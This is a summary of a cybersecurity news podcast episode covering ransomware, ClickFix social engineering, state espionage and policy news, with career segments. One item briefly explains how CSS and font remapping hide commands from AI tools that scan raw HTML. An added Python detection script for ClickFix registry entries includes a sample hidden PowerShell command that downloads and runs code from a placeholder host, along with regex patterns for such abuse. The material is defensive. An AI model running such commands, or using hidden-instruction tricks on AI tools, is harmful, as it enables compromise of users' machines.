Daily Cyber Threat Brief – Ep 1091 – March 18, 2026
Host: Dr. Gerald Auger ("Jerry")
Podcast: Simply Cyber Media Group
Main Theme:
Cutting through the top cyber news stories of the day relevant for security professionals, analysts, and leaders. Insightful analysis, practical takeaways, and real talk wrapping up cybersecurity headlines that matter most — all delivered in Jerry’s trademark, community-driven, high-energy style.
Episode Overview
This episode dives into eight headline infosec stories spanning critical infrastructure, collaborative threat intelligence, newly spotted attack methods, notable nation-state actions, and reflections on both industry nostalgia and career growth. Dr. Auger provides context, explains practical implications, and injects humor and authenticity while drawing on his own professional expertise and engaging the live chat community.
Key Topics & Insights
1. U.S. Department of Energy to Release First Cyber Strategy
[14:07–19:59]
- The DOE’s upcoming cyber strategy is teased, with focus on public-private partnerships and AI for defending critical infrastructure.
- Jerry’s Take:
- The energy sector’s unique challenges (legacy tech, OT/ICS) are acknowledged.
- Strategic plans have existed in other sectors for years (e.g., healthcare), and tactical implementation guidance for OT/ICS (like NIST SP 800-82) has been available for a decade.
- Quote:
“Is this moving the needle? No. Is it a good idea? Sure, sure, sure, sure. But...for the people turning wrenches and clicking keyboards, this has already been there.”
- Strategic plans are useful for executive buy-in and funding but don’t replace hands-on action.
2. Major Tech Companies Sign Accord to Fight Scams
[19:59–26:11]
- Google, Microsoft, Meta, Amazon, OpenAI, Adobe, and Match Group commit to sharing scam-related intel and deploying shared defense tactics. Voluntary agreement, no enforcement.
- Jerry’s Take:
- Celebrates collaboration, laments "reinventing the wheel."
- ISACs (Information Sharing & Analysis Centers) have existed for years and cover sectors like retail.
- Operationalizing shared threat intel is HARD — many orgs ingest data but don’t/can’t act on it due to resource and tooling gaps.
- Quote:
“Stop building new bridges and start repairing the existing bridges.”
“...If I turn on a fire hose of threat intelligence telemetry and spray it at your face, are you going to do something with it?...this is why Security Operations Center analysts is a job. Because it’s hard.”
3. Rendering Web Attack Hides Malicious Commands from AI
[26:11–31:08]
- LayerX researchers showcase a PoC that uses font remapping/CSS in webpages to hide malicious commands from LLM/AI tools.
- Jerry’s Take:
- Not new in concept — obfuscation has always been a race between adversaries and defenders.
- The attack evades AI tools that scan only the raw HTML, because the actual malicious instructions only appear once the page is rendered for the user.
- Calls on browser vendors (e.g., Chrome) to extend scanning to rendered JavaScript and assembled code.
- Quote:
“It’s trivial to fix. Okay, I guess I am saying it...We have the technology.”
4. Leaknet Ransomware Uses New "Bring Your Own Runtime" Tactic
[31:08–36:08]
- Leaknet group uses Deno runtime for in-memory JavaScript payloads, with initial access often via social engineering (“ClickFix” attack).
- Jerry’s Take:
- Details the “ClickFix” attack: attackers trick users into running malicious PowerShell via a fake Captcha/click prompt.
- End-user security awareness is critical, especially advising against “Windows+R, CTRL-V, Enter” when prompted.
- Technical mitigations: disable PowerShell for non-admins via Group Policy, block known malicious IPs/infrastructure, update IOCs.
- Quote:
“If you see this, don’t do it, period. Full stop...call me, I’ll come to your desk and give you a crispy high five.”
- Shout out to classic security education: Pyramid of Pain (David Bianco).
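As an added defender-side example (not from the episode or from Simply Cyber): the Win+R, Ctrl+V, Enter sequence Jerry describes leaves the pasted command in the user's Explorer RunMRU registry key, so a triage script can audit that history for ClickFix-style entries. The sample entries and the placeholder URL below are constructed; the registry path is the real RunMRU key.

```python
import re

# Constructed sample of HKCU\...\Explorer\RunMRU values as they look after a user
# pasted a "ClickFix" command into Win+R. Real entries carry a trailing "\1".
SAMPLE_RUNMRU = {
    "MRUList": "cba",  # most recent entry first
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": "powershell -w hidden -nop -c \"iex (iwr http://placeholder.invalid/f)\"\\1",
}

# Indicators typical of Run-dialog abuse: a LOLBin plus remote-fetch/hidden-window switches.
LOLBINS = re.compile(r"\b(powershell|pwsh|mshta|cmd|curl|wscript|cscript)\b", re.I)
SUSPICIOUS = re.compile(r"(-enc\w*|-w(indowstyle)?\s+hidden|-nop\w*|\biex\b|\biwr\b|"
                        r"invoke-(expression|webrequest)|https?://|\.hta\b)", re.I)


def parse_runmru(values):
    """Return the Run-dialog history, most recent first, with the trailing '\\1' stripped."""
    order = values.get("MRUList", "")
    return [values[k].removesuffix("\\1") for k in order if k in values]


def flag_clickfix(values):
    """Return commands that pair a LOLBin with remote-fetch or hidden-window switches."""
    return [cmd for cmd in parse_runmru(values)
            if LOLBINS.search(cmd) and SUSPICIOUS.search(cmd)]


def read_live_runmru():
    """On Windows, read the current user's RunMRU key; return {} on other platforms."""
    try:
        import winreg
    except ImportError:
        return {}
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    vals = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            i = 0
            while True:  # EnumValue raises OSError once the values are exhausted
                name, data, _ = winreg.EnumValue(key, i)
                vals[name] = data
                i += 1
    except OSError:
        pass
    return vals


if __name__ == "__main__":
    source = read_live_runmru() or SAMPLE_RUNMRU
    for hit in flag_clickfix(source):
        print("suspicious Run-dialog entry:", hit)
```

Run against the live key on a suspect workstation, or feed it exported RunMRU values; the same detection logic can be lifted into an EDR query on the registry value writes.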
5. EU Sanctions Iranian and Chinese Cyber Firms
[41:47–47:02]
- Sanctions against Iranian firm Emnet Pasargad and Chinese companies for attacks and "hack for hire" operations.
- Jerry’s Take:
- Economic sanctions are a genuine tool; losing access to EU markets is real pain.
- Draws parallels to U.S./Israel using private sector capabilities (e.g., NSA contractors, NSO Group).
- Quote:
“It’s not news that a government reaches into the private sector for cyber capabilities...There is enough evidence to support that they are actively involved.”
- Four national power levers (DIME): Diplomacy, Information, Military, Economics — sanctions are economic warfare.
6. Chinese State Hackers Dwell Years in SE Asian Military Networks
[47:02–54:32]
- Unit 42 reports six-year dwell time by a China-nexus group in military organizations, focused on targeted data exfiltration and intelligence.
- Jerry’s Take:
- “If you absolutely need to have espionage done immediately, you call China. There’s no one better.”
- Illustrates the extreme operational patience and specific targeting of nation-state adversaries.
- Contrasts “smash-and-grab” cybercriminals (financially motivated, noisy, fast) with state actors’ deliberate, stealthy, protracted missions.
- Quote:
“If you are worried about countries breaking into you, you should have a very mature cybersecurity program...low hanging fruit isn’t going to stop highly motivated, highly sophisticated threat actors.”
- For most listeners, direct impact is low unless working national defense or affected orgs.
7. UK Cyber Monitoring Center Plans “Cyber Disaster Scale” for US
[54:32–59:42]
- UK CMC aims to quantify cyber incidents 0–5 “like earthquakes/hurricanes” and extend the reporting system to the US.
- Jerry’s Take:
- Skeptical of utility; worried focus on “big” attacks neglects massive impact of smaller-scale hits (e.g., critical small business closures).
- Quote:
“The reason I don’t like this is...this loses context for smaller...targets or whatever.”
- Will watch to see if adoption catches on; compares to other standardized metrics (e.g., CVSS v4) that didn’t reach broad industry use.
8. North Korean Spearphishers Target KakaoTalk Users
[59:42–65:56]
- North Korea-linked group uses cleverly crafted LNK-file phishing attacks, exploiting the near-total KakaoTalk penetration in South Korea to achieve remote access and stage targeted malware distribution.
- Jerry’s Take:
- Explains spear phishing and lateral worming via trusted messaging platforms (cites analog from Melissa virus in 1999 for historical context).
- If your org (or region) uses KakaoTalk, educate end-users on these risks — old attacks repurposed for new platforms, harnessing social trust.
Memorable Moments & Community Shoutouts
- Recognition of HaircutFish/Dan Reardon as a model cyber influencer, for “delivering value to the community” and contributing in Discord, LinkedIn, and speaking engagements [00:01–03:00].
- Encouragement for newcomers:
“If you’re here for the first time...put in the effort to drop a #firsttimer.”
- Nostalgia Segment “Way Back Wednesday” featuring PlayStation 3, Xbox 360, Wii U as now “retro”; reminisces about childhood tech and community culture [36:45–41:47].
- Quote:
“For you Gen Z people, you’re living it for the first time. For some of us, we’re reliving it!”
- Reflections on Atari 2600, classic tech.
- Live chat and mod team appreciation:
- Quote:
“Mods just like throw peanuts and stuff at me and occasionally let me out. So thank you, mods.” [~12:00]
- Ongoing commitment to deliver CPE value—“Every episode is half a CPE.”
- Real-time authenticity: No scripted prep for stories—“Ain’t nobody got time for that!” [~09:00]
- Meta observations about cybersecurity education, career growth, frameworks (NIST CSF/RMF), certifications, and more during the "Jawjacking" Q&A session [65:58+].
- Notable recurring phrases:
- “My guy,…”
- “Cool story, bro.”
- “If you see this, don’t do it!”
Timestamps – Important Segments
| Segment | Timestamp |
|---|---|
| Introduction / Community shoutouts | 00:01–09:00 |
| DOE Cyber Strategy | 14:07–19:59 |
| Tech Accord Against Scams | 19:59–26:11 |
| AI-evading Web Obfuscation | 26:11–31:08 |
| Leaknet Ransomware (“ClickFix” attack) | 31:08–36:08 |
| “Way Back Wednesday” | 36:45–41:47 |
| EU Sanctions (Iran/China) | 41:47–47:02 |
| Chinese SE Asia Military Espionage | 47:02–54:32 |
| UK CMC – Cyber Disaster Scale | 54:32–59:42 |
| North Korea KakaoTalk Phishing | 59:42–65:56 |
| Live Q&A – “Jawjacking” on frameworks, certification, career questions, and more | 65:58–END |
Notable Quotes
- On energy sector strategies:
"Is this moving the needle? No. Is it a good idea? Sure...But for the people who are turning wrenches...you can already take action." [19:24]
- On threat intel sharing in practice:
"If I turn on a fire hose of threat intelligence telemetry and spray it at your face, are you going to do something with it?...This is why Security Operations Center analysts is a job. Because it’s hard." [25:30]
- On ransomware initial access trends:
"If you see this, don’t do it. Period. Full stop...call me, I’ll come to your desk and give you a crispy high five." [34:48]
- On state-sponsored espionage:
"If you absolutely need to have espionage done immediately, you call China. There’s no one better...they will slow-cook this thing and they will get in, they will do their kill chain to whatever speed it takes." [48:20 & 48:56]
- On benchmarking cyberattack “disasters”:
"The reason I don’t like this is because this loses context for smaller...targets or whatever." [55:57]
Additional Community & Career Value
- Career encouragement:
- Practical breakdowns of security frameworks (NIST CSF, RMF), certifications, and real-world implementation.
- Live Q&A:
- Resource sharing: “I have a video for that…” style answers, practical advice on PhDs, certs, finding mock interviews, and handling frameworks.
- Candid career advice: only pursue a PhD out of true passion, not just for advancement; the Google Cyber Cert is a good foundation but not a job guarantee.
- Live, unscripted energy, and humor.
- Calls for inclusivity and engagement:
- “Thank you for being here. Long timers, first timers…”
Conclusion
A dense, energetic episode serving both daily practitioners and those entering the infosec field. Expect historic perspective (throwbacks to Melissa/CodeRed, shoutouts to old consoles), practical how-to security advice, candid hot takes on industry news (and gripes about reinventing infosec wheels), deep dives on frameworks, and a sense of supportive community.
End message: “Go forth and crush it. ... Stay secure.”
